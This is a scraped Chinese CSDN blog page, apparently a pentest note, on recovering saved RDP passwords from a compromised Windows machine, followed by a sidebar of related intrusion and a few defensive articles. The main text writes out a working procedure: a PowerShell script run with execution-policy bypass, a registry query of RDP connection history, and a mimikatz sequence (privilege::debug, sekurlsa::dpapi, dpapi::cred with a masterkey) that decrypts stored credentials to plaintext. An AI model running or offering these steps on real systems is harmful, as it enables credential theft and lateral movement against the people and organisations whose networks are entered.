查看域内RDP连接记录获取密码

最新推荐文章于 2024-07-31 01:34:43 发布
最新推荐文章于 2024-07-31 01:34:43 发布
阅读量1.3k 收藏
点赞数
分类专栏: 初学者常见问题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43873557/article/details/113760724
版权

https://github.com/3gstudent/List-RDP-Connections-History.git

powershell -exec bypass ./ListAllUser.ps1

本地RDP连接密码解密
• Mimikatz
查看本地机器本地连接过的目标机器:
reg query “HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Servers” /s

查看本地用户此目录下是否存有RDP密码文件:
dir /a %userprofile%\AppData\Local\Microsoft\Credentials*

mimikatz.exe
选择一个密码文件对其进行解密:
privilege::debug
此处的目录是上面目录的地址
dpapi::cred /in:C:\Users\zyl\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D(RDP密码文件)
此处需要记录下guidMasterKey的值,待会要通过
guidMasterKey找对应的Masterkey。
guidMasterKey : {1e75dd29-3c76-48fb-9ff8-94c1a464159d}
{1e75dd29-3c76-48fb-9ff8-94c1a464159d}

根据guidMasterKey找到对应的Masterkey:
sekurlsa::dpapi

通过Masterkey解密pbData数据,拿到明文RDP连接密码:
dpapi::cred /in:C:\Users\zyl\AppData\Local\Microsoft\Credentials\DFBE70A7E5CC19A398EBF1B96859CE5D /masterkey:bdc48962ebfcb75e0faa66856f6cd42764c697640655269f25485feda687f7fabfe1db1e48c72cd79764ca79e0936ab675e441bb95f9025962998c78844876c3

低头观自在
关注
专栏目录
内网渗透(二十八)之Windows协议认证和密码抓取-Windows RDP凭证的抓取和密码破解
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
02-15 444
Credentials的解密是Windows系统信息收集中非常重要的一环,其中包括各类敏感、重要的凭证(这个可以理解为密码),接下来我们就讲解RDP凭证的抓取和破解 在我们点击保存密码后,Windows就通过MasterKey将我们的密码加密后保存在本地,由于Windows还需要解密从而使用,所以这个过程是可逆,也正因为这一缘由,我们只要拿到MasterKey就能将密码解出来。
第5章内横向移动分析及防御
willow_liang的博客
12-26 3954
第5章内横向移动分析及防御 内横向移动投不定在夏杂的内网攻击中被广泛使用的一种技术,尤其是在高级持续威胁(Advanced Persistent Threats,APT中。攻击者会利用该技术,以被攻陷的系统为跳板,访问其他内主机,扩大资产范围(包括跳板机器中的文档和存储的凭证,以及通过跳板机器连接的数据库、控制器或其他重要资产)。 通过此类攻击手段,攻击者最终可能获取控制器的访问权限,甚至完全控制基于Windows操作系统的基础设施和与业务相关的关键账户。因此,必须使用强口令来保护特权用户不被
List-RDP-Connections-History:使用powershell列出已登录用户或所有用户的RDP连接历史记录
04-29
列表-RDP-连接历史 使用powershell列出已登录用户或所有用户的RDP连接历史记录 列出已登录用户的RDP连接历史记录 枚举HKEY_USERS“ + $ User.SID +” \ Software \ Microsoft \ Terminal Server Client \ Servers \的注册表项值 列出所有用户的RDP连接历史记录 实现思路: 首先使用“ reg load”加载配置单元。 然后从HKEY_USERS阅读RDP连接历史记录。 最后,您需要使用“ reg卸载”来卸载配置单元。 笔记: 该脚本会自动执行上述操作,无需GUI。 :) 更多细节:
密码抓取--获取已控机器本地保存的RDP密码
网络安全。
02-24 1万+
0x01 简介 在获取内网机器管理员权限后,查看是否有保存到本地的RDP连接密码,对保存到本地的RDP连接密码进行解密,解密成功后可使用此凭据继续横向移动。 0x02 获取已控机器本地保存的RDP密码 一、mimikatz 1、查看本地机器本地连接过的目标机器。 reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Clie...
告别痕迹:远程桌面连接历史和凭据的清零指南
最新发布
HaiJaine的博客
07-31 1331
本文指出在工作中运用 Windows 远程桌面工具时,因安全与隐私因素,有时需删除连接的历史记录和凭据。文中给出了一个相关的 PowerShell 脚本,还说明了其使用方法,涵盖运行 PowerShell 的条件、CredentialManager 模块的安装、脚本的执行流程及输入选择等,同时提到了一些注意事项。
rdp连接工具_如何在Windows10中清除RDP连接历史记录
weixin_39915605的博客
11-30 1834
如何在Windows中清除RDP连接历史记录?内置的Windows远程桌面连接(RDP)客户端(mstsc.exe)保存每次成功连接到远程计算机后的远程计算机名(或IP地址)和用于登录的用户名。在下一次启动时,RDP客户端向用户提供选择以前使用的连接之一的功能。用户可以从列表中选择RDS / RDP主机的名称,客户端将自动填写先前用于登录的用户名。从最终用户的角度来看,这很方便,但是从安全角度来看...
powershell 登录 rdp_获取已控机器本地保存的RDP密码
weixin_39927508的博客
11-27 984
俗话说百因必有果,你的报应就是我,这篇文章的来历,还要从好兄弟的提问说起。本文就给大家聊一下关于获取已控机器本地保存的RDP密码的一些原理、思路、以及具体的实现方法。首先我们需要知道两个概念。第一、Dpapi从Windows 2000开始,Microsoft随操作系统一起提供了一种特殊的数据保护接口,称为Data Protection Application Programming In...
RDP文件密码加解密
12-13
用于远程连接中的.rdp文件的password 51:b: 这个设置的明文密码和二进制哈希转换
渗透.pdf
08-23
1. **抓取hash密码**:通过工具如`vssown.vbs`、`vshadow.exe`、`ntdsdump.exe`、`mimikatz`等抓取内的哈希密码。 2. **Hash注入**:利用获取到的哈希进行身份验证。 3. **读取LSA明文密码**:使用工具如`wce....
【内网学习笔记】4、内信息收集
TeamsSix 的 CSDN 空间
02-24 1017
1、判断是否存在 ipconfig 查看网关 IP 地址、DNS 的 IP 地址、名、本机是否和 DNS 服务器处于同一网段。 ipconfig /all C:\Users\daniel10> ipconfig /all Windows IP 配置 主 DNS 后缀 . . . . . . . . . . : teamssix.com DNS 后缀搜索列表 . . . . . . . . : teamssix.com 以太网适配器 Ethernet0: IPv4 地址
内网安全 - 横向移动RDP&SPN
acepanhuan的博客
03-17 503
内网安全 - 横向移动RDP&SPN
ListRDPConnections:C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透中获取更多可通内网网段信息以及定位运维管理人员主机
03-20
ListRDPConnections 简介 C#读取本机对外RDP连接记录和其他主机该主机的连接记录,从而内部网渗透中获取更多可通内网网段信息以及定位运维管理人员主机 原理 对外RDP连接记录 对外RDP连接记录保存在HKEY_USERS\[SID]\Software\Microsoft\Terminal Server Client\下,只能包含包含用户设置和已登录用户的信息 未登录用户连接记录需要通过加载对应用户目录下的NTUSER.DAT到主轴中并读取来实现 需要有SeBackupPrivilege和SeRestorePrivilege这部分权限才可以实现对插入的读和写操作 对内RDP连接记录 对内RDP连接记录保存在Windows事件日志中(eventvwr),以便获取更多连接信息,不再区分是否是通过RDP登录 一个完整的rdp登录->注销过程包括网络连接->身份认证->登录->注销
xfreerdp获取rdp加密后的密码_RDP验证数据包分析
weixin_39557576的博客
12-04 1168
国外有很多的软件,可以模拟客户端登陆windows远程桌面,以freerdp连接远程桌面进行说明。命令行:xfreerdp.exe /u:user /p:pass /v:ip。通过分析发现,在登陆阶段,会依次进行:-1- TCP/IP协议连接-2- COTP协议X.224-3- 建立ssl连接-4- NLA中连接(主要是ntlm认证)(补充:目标机器是win7 32系统)...
RDP密码凭据抓取
Y22Lee的博客
05-15 871
命令:dpapi::cred /in:凭据文件路径 /masterkey:masterkey值。
windows获取RDP连接记录
https://www.cnblogs.com/zpchcbd/
08-26 5807
0x01 获取RDP连接历史记录: 以下代码为3gStudent实现的获取连接记录的代码: <# .SYNOPSIS This script will list the logged-in users' RDP Connections History. Author: 3gstudent@3gstudent License: BSD 3-Clause #> $AllUser = Get...
[内网]RDP远程桌面密码凭证获取
Keepb1ue的博客
05-15 1万+
通过密码文件获取guidMasterKey的值,根据guidMasterKey找到对应Masterkey通过Masterkey进行解密,获取明文。
查询RDP端口的小技巧
m0_46607055的博客
01-22 6052
在内网的后渗透当中,拿下了一台主机的控制台后,通过此方法查询远程桌面服务RDP的端口号。
利用mimikatz查看rdp连接密码【渗透测试】
热门推荐
leeezp的博客
09-22 29万+
在使用 rdp 时会发现系统有保存连接密码的功能,一定在本地以一种加密方式保存,在连接的时候解密进行rdp尝试,那么我们能不能那到加密的密码解密以获取这台机器rdp连接过的机器呢?UserName就是账户,CredentialBlob 字段值是解密后的密码,如果是空,就尝试 Credentials 目录下其他凭据的值。(毕竟渗透也是个苦力活...)可以保存rdp凭据,ssh凭据等连接凭据。接下来就一个一个实验吧,因为这个下面是凭据的值,不一定哪一个是你要的,需要写工具批量查喽。
凭据获取学习记录
weixin_44912035的博客
02-03 2315
常见凭据获取 常见运维工具凭据获取 xshell 连接记录保存在xshell的安装目录下session目录中以后缀为xsh文件。 工具下载地址:https://github.com/HyperSine/how-does-Xmanager-encrypt-password SecureCRT github下载链接:https://github.com/gitPoc32/Forensic/tree/master/VanDykeSecureCRT 运行命令:python VanDyke_SecureCRT_de
如何保存远程桌面连接rdp文件
"远程桌面连接保存为rdp文件,该技术可以帮助用户便捷地管理多个远程服务器,无需记住每个服务器的登录名和密码。通过将登录信息保存在rdp文件中,用户只需双击文件即可快速接入服务器。适用于多服务器维护场景,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值